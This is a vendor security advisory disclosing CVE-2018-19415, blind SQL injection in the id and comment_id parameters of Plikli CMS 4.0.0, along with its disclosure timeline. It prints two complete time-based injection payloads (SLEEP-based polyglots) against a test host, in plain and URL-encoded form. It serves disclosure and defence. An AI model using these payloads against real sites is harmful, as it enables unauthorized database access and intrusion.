Blind SQL Injection Vulnerabilities in Plikli 4.0.0

Information

Advisory by Netsparker (now Invicti)
Name: Blind SQL Injection Vulnerabilities in Plikli CMS
Affected Software: Plikli
Affected Versions: 4.0.0
Homepage: https://www.plikli.com/
Vulnerability: Blind SQL Injection
Severity: Critical
Status: Fixed
CVE-ID: CVE-2018-19415
Invicti Advisory Reference: NS-18-031

Technical Details

Blind SQL Injection

URL: http://NSAppTest/plikli/join_group.php?id=1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/&privacy=public&join=true
Parameter Name: id
Parameter Type: GET
Attack Pattern: 1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

URL: http://NSAppTest/plikli/story.php?title=test&comment_id=3 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
Parameter Name: comment_id
Parameter Type: GET
Attack Pattern: 3+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

For more information on SQL injection vulnerabilities, read the section SQL injection.

Advisory Timeline

28th June 2018 – First Contact
3rd August 2018 – Vendor Fixed
4th December 2018- Advisory Released

Credits & Authors

These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.